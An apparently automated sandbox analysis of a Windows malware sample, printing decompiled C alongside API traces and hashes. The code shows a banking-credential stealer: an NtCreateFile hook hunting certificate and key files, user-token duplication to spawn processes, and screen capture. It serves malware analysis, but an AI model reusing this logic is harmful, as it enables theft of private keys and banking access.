        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ChangeCloseCreateFindNotificationOpenProcessThreadUser
        • String ID:
        • API String ID: 307445780-0
        • Opcode ID: 0eb0c21b0a5585bb54d92854748c17eb180424eabf850b45c15d845dffe53570
        • Instruction ID: 2bdbac12452e5e75da079e005a4d96ba9dd6aeff98c1d982260a35fd844296d2
        • Opcode Fuzzy Hash: 0eb0c21b0a5585bb54d92854748c17eb180424eabf850b45c15d845dffe53570
        • Instruction Fuzzy Hash: 1701F7719082887FDB115AA48C86EFF7B6C9F12348B04C0BAE951B3241D27D6E4483FA
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00410093(WCHAR* _a4) {
        				signed int _t6;
        
        				SetFileAttributesW(_a4, 0x20); // executed
        				_t6 = DeleteFileW(_a4); // executed
        				return _t6 & 0xffffff00 | _t6 != 0x00000000;
        			}

        APIs
        • SetFileAttributesW.KERNELBASE(?,00000020,004120FD,?,?,?,00000000), ref: 00410099
        • DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 004100A3
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$AttributesDelete
        • String ID:
        • API String ID: 2910425767-0
        • Opcode ID: 4104a7cb30020e15b4784b728f104f1066b9e4830a914809844837b0eef5e374
        • Instruction ID: f14d566895ae447b217156bc0b8ee6588b1150b6925b4449eda79f6748290af0
        • Opcode Fuzzy Hash: 4104a7cb30020e15b4784b728f104f1066b9e4830a914809844837b0eef5e374
        • Instruction Fuzzy Hash: CBC04C35204201ABDA011B60ED4AB8E7A65AFD4B41F05C435B14594070D7318960AA09
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,004069ED,?,?), ref: 0040AE5D
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FolderPathSpecial
        • String ID:
        • API String ID: 994120019-0
        • Opcode ID: 4aa9e1ff55cceeb0f6f5d56b9a324b23886d77736b2839a0f6ca920ba8c93d5d
        • Instruction ID: 7d4864c7b7c44e9a0af9653d65fc2c656479d13e0f1d86e8f061fcabaeaa6c66
        • Opcode Fuzzy Hash: 4aa9e1ff55cceeb0f6f5d56b9a324b23886d77736b2839a0f6ca920ba8c93d5d
        • Instruction Fuzzy Hash: 48D012B16285105FFB0C4724DC7BFB53354DB94721F06031CB617CF1E0E69138808628
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040F14B(void* __eax) {
        				void* _t3;
        
        				_t3 = RtlAllocateHeap( *0x415fa8, 8, __eax + 4); // executed
        				return _t3;
        			}

        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 730c46b804c13298d5f37d6082e359b0b2830845f3f8598c190773a0783341ac
        • Instruction ID: 11f71faade9671c55abd94f71c8cf329e8e06a5e89656a07fb823bf70d92ae39
        • Opcode Fuzzy Hash: 730c46b804c13298d5f37d6082e359b0b2830845f3f8598c190773a0783341ac
        • Instruction Fuzzy Hash: 7DB01130280A00BEFE000B00EC0ABA03A28F38030AF00C030B002E22B0CAA0A8228B08
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        C-Code - Quality: 43%
        			E00408DDB(WCHAR* _a4, char _a8, signed int _a12) {
        				void* _v12;
        				WCHAR** _v16;
        				void* _v20;
        				void* _v24;
        				_Unknown_base(*)()* _v28;
        				struct HDC__* _v32;
        				struct tagPOINT _v40;
        				_Unknown_base(*)()* _v44;
        				intOrPtr _v48;
        				_Unknown_base(*)()* _v52;
        				_Unknown_base(*)()* _v56;
        				_Unknown_base(*)()* _v60;
        				_Unknown_base(*)()* _v64;
        				_Unknown_base(*)()* _v68;
        				_Unknown_base(*)()* _v72;
        				_Unknown_base(*)()* _v76;
        				_Unknown_base(*)()* _v80;
        				_Unknown_base(*)()* _v84;
        				char _v88;
        				_Unknown_base(*)()* _v92;
        				intOrPtr _v96;
        				char _v124;
        				signed int _v128;
        				struct HINSTANCE__* _v132;
        				struct HINSTANCE__* _v136;
        				struct HINSTANCE__* _v140;
        				char _v144;
        				struct _ICONINFO _v164;
        				char _v180;
        				intOrPtr _t159;
        				intOrPtr _t161;
        				intOrPtr _t163;
        				intOrPtr _t165;
        				intOrPtr _t167;
        				intOrPtr _t169;
        				intOrPtr _t171;
        				intOrPtr _t173;
        				_Unknown_base(*)()* _t174;
        				intOrPtr _t176;
        				intOrPtr _t178;
        				_Unknown_base(*)()* _t179;
        				intOrPtr _t180;
        				intOrPtr _t182;
        				intOrPtr _t184;
        				intOrPtr _t186;
        				intOrPtr _t188;
        				intOrPtr _t190;
        				intOrPtr _t192;
        				intOrPtr _t194;
        				intOrPtr _t196;
        				_Unknown_base(*)()* _t197;
        				intOrPtr _t202;
        				struct HICON__* _t205;
        				signed int _t209;
        				intOrPtr _t211;
        				void* _t216;
        				void* _t239;
        				intOrPtr* _t240;
        				intOrPtr* _t258;
        				intOrPtr _t259;
        				signed int _t260;
        				void* _t261;
        				void* _t263;
        				unsigned int _t270;
        				struct HINSTANCE__* _t271;
        				struct HINSTANCE__* _t272;
        				struct HINSTANCE__* _t273;
        				signed int _t274;
        				signed int _t275;
        				void* _t281;
        
        				_t159 =  *0x414ad4; // 0x241f5a8
        				_t271 = LoadLibraryA( *(_t159 + 0x80));
        				_t161 =  *0x414ad4; // 0x241f5a8
        				_v28 = GetProcAddress(_t271,  *(_t161 + 0x90));
        				_t163 =  *0x414ad4; // 0x241f5a8
        				_v72 = GetProcAddress(_t271,  *(_t163 + 0x94));
        				_t165 =  *0x414ad4; // 0x241f5a8
        				_v68 = GetProcAddress(_t271,  *(_t165 + 0x98));
        				_t167 =  *0x414ad4; // 0x241f5a8
        				_v76 = GetProcAddress(_t271,  *(_t167 + 0x9c));
        				_t169 =  *0x414ad4; // 0x241f5a8
        				_v80 = GetProcAddress(_t271,  *(_t169 + 0xa0));
        				_t171 =  *0x414ad4; // 0x241f5a8
        				_v60 = GetProcAddress(_t271,  *(_t171 + 0xa4));
        				_t173 =  *0x414ad4; // 0x241f5a8
        				_t174 = GetProcAddress(_t271,  *(_t173 + 0xa8));
        				_v92 = _t174;
        				if(_t271 == 0 || _v28 == 0 || _v72 == 0 || _v68 == 0 || _v76 == 0 || _v80 == 0 || _v60 == 0 || _t174 == 0) {
        					L52:
        					return 0;
        				} else {
        					_t176 =  *0x414ad4; // 0x241f5a8
        					_t272 = LoadLibraryA( *(_t176 + 0x84));
        					_t178 =  *0x414ad4; // 0x241f5a8
        					_t179 = GetProcAddress(_t272,  *(_t178 + 0xac));
        					_v84 = _t179;
        					if(_t272 == 0 || _t179 == 0) {
        						goto L52;
        					} else {
        						_t180 =  *0x414ad4; // 0x241f5a8
        						_t273 = LoadLibraryA( *(_t180 + 0x88));
        						_t182 =  *0x414ad4; // 0x241f5a8
        						_t258 = GetProcAddress(_t273,  *(_t182 + 0xb0));
        						_t184 =  *0x414ad4; // 0x241f5a8
        						_v16 = GetProcAddress(_t273,  *(_t184 + 0xb4));
        						_t186 =  *0x414ad4; // 0x241f5a8
        						_v12 = GetProcAddress(_t273,  *(_t186 + 0xb8));
        						_t188 =  *0x414ad4; // 0x241f5a8
        						_v20 = GetProcAddress(_t273,  *(_t188 + 0xbc));
        						_t190 =  *0x414ad4; // 0x241f5a8
        						_v44 = GetProcAddress(_t273,  *(_t190 + 0xc0));
        						_t192 =  *0x414ad4; // 0x241f5a8
        						_v52 = GetProcAddress(_t273,  *(_t192 + 0xc4));
        						_t194 =  *0x414ad4; // 0x241f5a8
        						_v56 = GetProcAddress(_t273,  *(_t194 + 0xc8));
        						_t196 =  *0x414ad4; // 0x241f5a8
        						_t197 = GetProcAddress(_t273,  *(_t196 + 0xcc));
        						_v64 = _t197;
        						if(_t273 == 0 || _t258 == 0 || _v16 == 0 || _v12 == 0 || _v20 == 0 || _v44 == 0 || _v52 == 0 || _v56 == 0 || _t197 == 0) {
        							goto L52;
        						} else {
        							_v24 = 0;
        							_v144 = 1;
        							_v140 = 0;
        							_v136 = 0;
        							_v132 = 0;
        							if(_a12 != 0 || E0040B6B3() != 0) {
        								_push(0);
        								_push( &_v144);
        								_push( &_v88);
        								if(_v28() != 0) {
        									goto L51;
        								}
        								_t202 =  *0x414ad4; // 0x241f5a8
        								_t259 =  *_t258( *((intOrPtr*)(_t202 + 0x8c)), 0, 0, 0);
        								_v28 = _t259;
        								_v32 = _v16(_t259);
        								_v40.y = 0;
        								_v40.x = 0;
        								_t205 = LoadCursorW(0, 0x7f00);
        								_v16 = _t205;
        								GetIconInfo(_t205,  &_v164);
        								GetCursorPos( &_v40);
        								if(_a12 == 0) {
        									_t209 = _v12(_t259, 8);
        									_t274 = _t209;
        									_t260 = _v12(_t259, 0xa);
        								} else {
        									_t274 = _a12 & 0x0000ffff;
        									_t260 = _t274;
        								}
        								_t211 = _v20(_v28, _t274, _t260);
        								_v48 = _t211;
        								if(_t211 == 0) {
        									L50:
        									_t152 =  &_v32; // 0x4066e6
        									_v64( *_t152);
        									_v64(_v28);
        									_v72(_v88);
        									goto L51;
        								} else {
        									_t72 =  &_v32; // 0x4066e6
        									_v96 = _v44( *_t72, _t211);
        									_t216 = 0;
        									_t263 = 0;
        									if(_a12 != 0) {
        										_t270 = (_a12 & 0x0000ffff) >> 1;
        										_t216 = _v40.x - _t270;
        										_v40.x = _v40.x - _t216;
        										_t263 = _v40.y - _t270;
        										_v40.y = _v40.y - _t263;
        									}
        									_v52(_v32, 0, 0, _t274, _t260, _v28, _t216, _t263, 0x40cc0020);
        									DrawIcon(_v32, _v40.x - _v164.xHotspot, _v40.y - _v164.yHotspot, _v16);
        									_push( &_v12);
        									_push(0);
        									_push(_v48);
        									_v12 = 0;
        									if(_v68() != 0 || _v12 == 0) {
        										L49:
        										_v44(_v32, _v96);
        										_v56(_v48);
        										goto L50;
        									} else {
        										_push( &_v20);
        										_push( &_a12);
        										_a12 = 0;
        										_v20 = 0;
        										if(_v80() != 0) {
        											L48:
        											_v76(_v12);
        											goto L49;
        										}
        										_t231 = _v20;
        										if(_v20 == 0 || _a12 == 0) {
        											goto L48;
        										} else {
        											_t261 = E0040F14B(_t231);
        											if(_t261 == 0) {
        												goto L48;
        											}
        											_v60(_a12, _v20, _t261);
        											_t275 = 0;
        											if(_a12 <= 0) {
        												L40:
        												E0040F15E(_t261);
        												if(_v20 == 0) {
        													_push( &_v24);
        													_push(1);
        													_push(0);
        													if(_v84() == 0 && _v24 != 0) {
        														_v128 = 0;
        														if(_a8 > 0) {
        															E0040F19A( &_v124, 0x401ad8, 0x10);
        															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x64)) = 4;
        															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x68)) = 1;
        															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x60)) =  &_a8;
        															_v128 = _v128 + 1;
        														}
        														_t239 = _v92(_v12, _v24,  &_v180,  &_v128);
        														_t240 = _v24;
        														if(_t239 == 0) {
        															 *((intOrPtr*)( *_t240 + 0x14))(_t240, 0, 0, 0, 0);
        														} else {
        															 *((intOrPtr*)( *_t240 + 8))(_t240);
        															_v24 = 0;
        														}
        													}
        												}
        												goto L48;
        											}
        											_t108 = _t261 + 0x30; // 0x30
        											_v16 = _t108;
        											while(lstrcmpiW(_a4,  *_v16) != 0) {
        												_v16 = _v16 + 0x4c;
        												_t275 = _t275 + 1;
        												if(_t275 < _a12) {
        													continue;
        												}
        												goto L40;
        											}
        											E0040F19A( &_v180, _t275 * 0x4c + _t261, 0x10);
        											_v20 = 0;
        											goto L40;
        										}
        									}
        								}
        							} else {
        								L51:
        								return _v24;
        							}
        						}
        					}
        				}
        			}

        APIs
        • LoadLibraryA.KERNELBASE(?), ref: 00408DF2
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E06
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E1B
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E30
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E45
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E5A
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E6F
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E84
        • LoadLibraryA.KERNELBASE(?), ref: 00408EE0
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408EF4
        • LoadLibraryA.KERNELBASE(?), ref: 00408F18
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408F2C
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408F40
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408F55
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408F6A
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408F7F
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408F94
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408FA9
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408FBE
        • LoadCursorW.USER32(00000000,00007F00), ref: 00409083
        • GetIconInfo.USER32(00000000,?), ref: 00409094
        • GetCursorPos.USER32(?), ref: 0040909E
        • DrawIcon.USER32(?,?,?,?), ref: 0040912D
          • Part of subcall function 0040B6B3: OpenWindowStationA.USER32(?,00000000,10000000), ref: 0040B6C7
          • Part of subcall function 0040B6B3: SetProcessWindowStation.USER32(00000000), ref: 0040B6D4
          • Part of subcall function 0040B6B3: OpenDesktopA.USER32(?,00000000,00000000,10000000), ref: 0040B6E9
          • Part of subcall function 0040B6B3: SetThreadDesktop.USER32(00000000), ref: 0040B6F6
          • Part of subcall function 0040B6B3: CloseDesktop.USER32(00000000), ref: 0040B6FF
          • Part of subcall function 0040B6B3: CloseWindowStation.USER32(00000000), ref: 0040B706
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 004091AD
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressProc$Load$DesktopLibraryStationWindow$CloseCursorIconOpen$AllocateDrawHeapInfoProcessThreadlstrcmpi
        • String ID: f@
        • API String ID: 1533534080-2705987885
        • Opcode ID: ed4beb0569255d0ef9b3c07fd4478b2e68f744a44725c32aef4e62fa5e5c180f
        • Instruction ID: a924fc9a4a05040214d4054f3fb834b2b8096d4e87672de3e8ca597625d5da41
        • Opcode Fuzzy Hash: ed4beb0569255d0ef9b3c07fd4478b2e68f744a44725c32aef4e62fa5e5c180f
        • Instruction Fuzzy Hash: F5E1F271901218EFCF11DFA4DD88AEEBBB9FF48700F1584BAF509A6262D7344941CB99
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 68%
        			E0040B4C6(long _a4, WCHAR* _a8, WCHAR* _a12) {
        				void* _v12;
        				void* _v16;
        				_Unknown_base(*)()* _v20;
        				struct _PROCESS_INFORMATION _v36;
        				struct _STARTUPINFOW _v112;
        				int _t48;
        				signed int _t63;
        				struct HINSTANCE__* _t74;
        				_Unknown_base(*)()* _t77;
        				long _t81;
        				intOrPtr* _t82;
        				intOrPtr* _t83;
        				void* _t84;
        				void* _t85;
        				signed int _t86;
        				struct HINSTANCE__* _t87;
        
        				_t81 = 0x44;
        				_t86 = 0;
        				E0040F21C( &_v112,  &_v112, 0, _t81);
        				_v112.cb = _t81;
        				_v112.lpDesktop = 0;
        				if(_a4 == 0 || ( *0x414be8 & 0x00000001) != 0 || E0040B6B3() == 0) {
        					L26:
        					_t48 = CreateProcessW(_a8, _a12, 0, 0, 0, 0, 0, 0,  &_v112,  &_v36);
        					if(_t48 == 0) {
        						return _t48;
        					}
        					goto L27;
        				} else {
        					_v16 = 0;
        					_t82 = GetProcAddress( *0x414d18, "WTSGetActiveConsoleSessionId");
        					if(_t82 == 0) {
        						L10:
        						_a4 = 0;
        						if(GetWindowThreadProcessId(GetForegroundWindow(),  &_a4) > 0) {
        							_t84 = OpenProcess(0x400, 0, _a4);
        							if(_t84 != 0) {
        								if(OpenProcessToken(_t84, 0xb,  &_v16) != 0) {
        									_t86 = 1;
        								}
        								CloseHandle(_t84);
        							}
        						}
        						if(_t86 != 1) {
        							goto L26;
        						} else {
        							L16:
        							_v12 = 0;
        							if(DuplicateTokenEx(_v16, 0x2000000, 0, 1, 1,  &_v12) != 0) {
        								_t87 = LoadLibraryA("userenv.dll");
        								_v20 = 0;
        								_a4 = 0;
        								if(_t87 != 0) {
        									_t83 = GetProcAddress(_t87, "CreateEnvironmentBlock");
        									_v20 = GetProcAddress(_t87, "DestroyEnvironmentBlock");
        									if(_t83 != 0) {
        										_push(0);
        										_push(_v12);
        										_push( &_a4);
        										if( *_t83() == 0) {
        											_a4 = 0;
        										}
        									}
        								}
        								_t63 = CreateProcessAsUserW(_v12, _a8, _a12, 0, 0, 0, 0x400, _a4, 0,  &_v112,  &_v36);
        								asm("sbb esi, esi");
        								_t86 =  ~( ~_t63);
        								if(_v20 != 0 && _a4 != 0) {
        									_v20(_a4);
        								}
        								CloseHandle(_v12);
        							}
        							CloseHandle(_v16);
        							if(_t86 == 1) {
        								L27:
        								CloseHandle(_v36);
        								CloseHandle(_v36.hThread);
        								return _v36.dwProcessId;
        							} else {
        								goto L26;
        							}
        						}
        					}
        					_t74 = LoadLibraryA("wtsapi32.dll");
        					_a4 = _t74;
        					if(_t74 != 0) {
        						_t85 =  *_t82();
        						if(_t85 != 0xffffffff) {
        							_t77 = GetProcAddress(_a4, "WTSQueryUserToken");
        							if(_t77 != 0) {
        								_push( &_v16);
        								_push(_t85);
        								if( *_t77() != 0) {
        									_t86 = 1;
        								}
        							}
        						}
        						FreeLibrary(_a4);
        						if(_t86 == 1) {
        							goto L16;
        						}
        					}
        					goto L10;
        				}
        			}

        APIs
        • GetProcAddress.KERNEL32(WTSGetActiveConsoleSessionId,00000000), ref: 0040B518
        • LoadLibraryA.KERNEL32(wtsapi32.dll), ref: 0040B529
        • GetProcAddress.KERNEL32(?,WTSQueryUserToken), ref: 0040B547
        • FreeLibrary.KERNEL32(?), ref: 0040B560
        • GetForegroundWindow.USER32(?), ref: 0040B572
        • GetWindowThreadProcessId.USER32(00000000), ref: 0040B579
        • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0040B58C
        • OpenProcessToken.ADVAPI32(00000000,0000000B,?), ref: 0040B59F
        • CloseHandle.KERNEL32(00000000), ref: 0040B5AD
        • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 0040B5D0
        • LoadLibraryA.KERNEL32(userenv.dll), ref: 0040B5E3
        • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0040B5FB
        • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 0040B609
        • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 0040B644
        • CloseHandle.KERNEL32(?), ref: 0040B665
        • CloseHandle.KERNEL32(?), ref: 0040B66E
        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006,00000000,00000000,00000044,?,?,00000000), ref: 0040B68D
        • CloseHandle.KERNEL32(?), ref: 0040B69A
        • CloseHandle.KERNEL32(?), ref: 0040B6A3
          • Part of subcall function 0040B6B3: OpenWindowStationA.USER32(?,00000000,10000000), ref: 0040B6C7
          • Part of subcall function 0040B6B3: SetProcessWindowStation.USER32(00000000), ref: 0040B6D4
          • Part of subcall function 0040B6B3: OpenDesktopA.USER32(?,00000000,00000000,10000000), ref: 0040B6E9
          • Part of subcall function 0040B6B3: SetThreadDesktop.USER32(00000000), ref: 0040B6F6
          • Part of subcall function 0040B6B3: CloseDesktop.USER32(00000000), ref: 0040B6FF
          • Part of subcall function 0040B6B3: CloseWindowStation.USER32(00000000), ref: 0040B706
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Close$Process$HandleWindow$AddressOpenProc$DesktopLibraryStation$CreateLoadThreadToken$DuplicateForegroundFreeUser
        • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$WTSGetActiveConsoleSessionId$WTSQueryUserToken$userenv.dll$wtsapi32.dll
        • API String ID: 1454815141-2217652461
        • Opcode ID: 4b11768f59a542fdf487dcb0a297275a3d00764a6299e36aec03c6cadcf043d2
        • Instruction ID: d4e3d2a24ac4a6396a5aa13b1ca398a9f11103fb085fa0c9a777eeaa8b0c0aac
        • Opcode Fuzzy Hash: 4b11768f59a542fdf487dcb0a297275a3d00764a6299e36aec03c6cadcf043d2
        • Instruction Fuzzy Hash: 49515C72900218BFDF119FA0DC88EEE7BB9EB44745F14843AF915B62A0D7358A408B9C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 94%
        			E00405F35(void* __edi, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
        				struct _SECURITY_ATTRIBUTES* _v8;
        				char* _v12;
        				char* _v16;
        				char* _v20;
        				char _v532;
        				short _v540;
        				long _t57;
        				void* _t74;
        				signed short* _t78;
        				signed int _t79;
        				struct _EXCEPTION_RECORD _t95;
        				void* _t96;
        				void* _t97;
        				char* _t98;
        				WCHAR* _t101;
        				WCHAR* _t102;
        				void* _t103;
        				char _t104;
        				intOrPtr _t105;
        				intOrPtr _t106;
        				intOrPtr _t107;
        				char _t117;
        				intOrPtr _t118;
        				intOrPtr _t122;
        				intOrPtr _t123;
        
        				_t97 = __edi;
        				_t95 = _a12;
        				_v540 = 0;
        				_t104 =  *0x41479c; // 0x65
        				if(_t104 != 0) {
        					L4:
        					if(_a4 != 0 && _t95 != 0 && (_a32 & 0x00000003) != 0) {
        						_t78 =  *(_t95 + 8);
        						if(_t78 != 0) {
        							_t79 =  *_t78 & 0x0000ffff;
        							if(_t79 > 0xa && _t79 < 0x206) {
        								E0040F19A( &_v540, ( *(_t95 + 8))[2],  *( *(_t95 + 8)) & 0x0000ffff);
        								 *((short*)(_t103 + (( *( *(_t95 + 8)) & 0x0000ffff) >> 1) * 2 - 0x218)) = 0;
        							}
        						}
        					}
        					L11:
        					_t100 = _a4;
        					_t57 = NtCreateFile(_a4, _a8, _t95, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
        					_a32 = _t57;
        					if(_t57 == 0 && _v540 > 0) {
        						_push(_t97);
        						_t98 = L"*.pem";
        						_t117 =  *0x41479c; // 0x65
        						if(_t117 != 0) {
        							 *0x41479c = 0;
        							_v20 = L"*.dat";
        							_v16 = _t98;
        							_v12 = L"*.p12";
        							_v8 = 0;
        							E00405E39( &_v20,  &_v540, _t117, 1,  *_t100, L"ibank2.cab", 0);
        							 *0x41479c = 1;
        						}
        						_t118 =  *0x41479f; // 0x69
        						if(_t118 != 0) {
        							_t101 = L"sign.cer";
        							_v16 = L"prv_key.pfx";
        							_v12 = _t101;
        							_v8 = 0;
        							if(E00405E39( &_v16,  &_v540, _t118, 0,  *_a4, L"faktura", 0) == 0) {
        								PathRemoveFileSpecW( &_v540);
        								PathCombineW( &_v540,  &_v540, _t101);
        								_push(L"\\??\\");
        								_t96 = 4;
        								_t102 =  &_v540;
        								if(E0040F6F6(_t96, _t102, _t96) == 0) {
        									_t102 =  &_v532;
        								}
        								_t74 = CreateFileW(_t102, 0x80000000, 3, 0, 3, 0, 0);
        								if(_t74 != 0xffffffff) {
        									CloseHandle(_t74);
        								}
        							}
        						}
        						_t122 =  *0x41479e; // 0x74
        						if(_t122 != 0) {
        							 *0x41479e = 0;
        							_v20 = L"*.db3";
        							_v16 = _t98;
        							_v12 = L"*.key";
        							_v8 = 0;
        							E00405E39( &_v20,  &_v540, _t122, 1,  *_a4, L"interpro.cab", 1);
        							 *0x41479e = 1;
        						}
        						_t123 =  *0x41479d; // 0x74
        						if(_t123 != 0) {
        							_v12 = L"*.jks";
        							_v8 = 0;
        							E00405E39( &_v12,  &_v540, _t123, 0,  *_a4, L"jks", 0);
        						}
        					}
        					return _a32;
        				}
        				_t105 =  *0x41479f; // 0x69
        				if(_t105 != 0) {
        					goto L4;
        				}
        				_t106 =  *0x41479e; // 0x74
        				if(_t106 != 0) {
        					goto L4;
        				}
        				_t107 =  *0x41479d; // 0x74
        				if(_t107 == 0) {
        					goto L11;
        				}
        				goto L4;
        			}

        APIs
        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00405FDF
        • PathRemoveFileSpecW.SHLWAPI(?), ref: 00406087
        • PathCombineW.SHLWAPI(?,?,sign.cer), ref: 00406096
        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,\??\), ref: 004060CA
        • CloseHandle.KERNEL32(00000000), ref: 004060D6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$CreatePath$CloseCombineHandleRemoveSpec
        • String ID: *.dat$*.db3$*.jks$*.key$*.p12$*.pem$\??\$faktura$ibank2.cab$interpro.cab$jks$prv_key.pfx$sign.cer
        • API String ID: 1502233104-928899744
        • Opcode ID: 3bff7efcf6c74ec80a9d84fd61ce71c33da85ae4c69256dd1681b6fa86ab65ec
        • Instruction ID: 3bc306c77b7a143edd12a7e9b058f65d7dc864529343ddc5b116cba2421c5e03
        • Opcode Fuzzy Hash: 3bff7efcf6c74ec80a9d84fd61ce71c33da85ae4c69256dd1681b6fa86ab65ec
        • Instruction Fuzzy Hash: E6519B71940259AFDF10DF90DC84AEEBB68EB15314F0481BAF905B72E1D7788A94CB98
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 85%
        			E004048AC(WCHAR* __ecx, intOrPtr __edx) {
        				char _v8;
        				void* _v12;
        				char _v16;
        				intOrPtr _v20;
        				WCHAR* _v24;
        				WCHAR* _v572;
        				WCHAR* _v574;
        				struct _WIN32_FIND_DATAW _v620;
        				short _v622;
        				short _v1140;
        				short _v1660;
        				void* _t57;
        				int _t63;
        				long _t67;
        				intOrPtr _t69;
        				WCHAR** _t70;
        				int _t72;
        				intOrPtr _t79;
        				intOrPtr _t82;
        				WCHAR* _t87;
        				long _t89;
        				intOrPtr _t93;
        				signed int _t99;
        				intOrPtr _t100;
        				char _t101;
        				void* _t102;
        
        				_t98 = __edx;
        				_t97 = __ecx;
        				_v20 = __edx;
        				_v24 = __ecx;
        				PathCombineW( &_v1140, __ecx, "*");
        				_v622 = 0;
        				_t57 = FindFirstFileW( &_v1140,  &_v620);
        				_v12 = _t57;
        				if(_t57 != 0xffffffff) {
        					__eflags = 0;
        					do {
        						__eflags = _v620.cFileName - 0x2e;
        						if(_v620.cFileName != 0x2e) {
        							L7:
        							__eflags = _v620.dwFileAttributes & 0x00000010;
        							if((_v620.dwFileAttributes & 0x00000010) == 0) {
        								 *0x414ed8("pVirtualKeyExA");
        								_t99 = 0;
        								__eflags =  *0x414778; // 0x74537972
        								if(__eflags <= 0) {
        									L21:
        									 *0x414edc("pVirtualKeyExA");
        									Sleep(0x14);
        									L22:
        									__eflags =  *0x414778; // 0x74537972
        									if(__eflags <= 0) {
        										break;
        									}
        									goto L23;
        								} else {
        									goto L11;
        								}
        								do {
        									L11:
        									_t69 =  *0x41477c; // 0x676e6972
        									_t70 = _t69 + _t99 * 4;
        									__eflags =  *_t70;
        									if( *_t70 == 0) {
        										goto L16;
        									}
        									__eflags = _v620.nFileSizeHigh;
        									if(_v620.nFileSizeHigh != 0) {
        										goto L16;
        									}
        									_t72 = PathMatchSpecW( &(_v620.cFileName),  *_t70);
        									__eflags = _t72;
        									if(_t72 == 0) {
        										goto L16;
        									}
        									PathCombineW( &_v1140, _v24,  &(_v620.cFileName));
        									_t101 = _v620.nFileSizeLow;
        									_t79 =  *0x414ad4; // 0x241f5a8
        									_v8 = 4;
        									_v16 = 0;
        									__eflags = E004085D2(0x80000001,  *((intOrPtr*)(_t79 + 0x174)),  &_v1140, 0,  &_v16,  &_v8);
        									if(__eflags == 0) {
        										L18:
        										_t82 =  *0x414ad4; // 0x241f5a8
        										wnsprintfW( &_v1660, 0x103,  *(_t82 + 0x178), _v620.nFileSizeLow,  &(_v620.cFileName));
        										_t102 = _t102 + 0x14;
        										_t87 = E00413599(_t97, _t98, __eflags,  &_v1140, 0,  &_v1660);
        										__eflags = _t87;
        										if(_t87 != 0) {
        											_v8 = _v620.nFileSizeLow;
        											_t93 =  *0x414ad4; // 0x241f5a8
        											E0040861B(0x80000001,  *((intOrPtr*)(_t93 + 0x174)),  &_v1140, 4,  &_v8, 4);
        										}
        										_t89 = WaitForSingleObject( *(_v20 + 4), 0x2710);
        										__eflags = _t89;
        										if(_t89 == 0) {
        											goto L24;
        										} else {
        											goto L21;
        										}
        									}
        									__eflags = _t101 - _v16;
        									if(__eflags != 0) {
        										goto L18;
        									}
        									L16:
        									_t99 = _t99 + 1;
        									__eflags = _t99 -  *0x414778; // 0x74537972
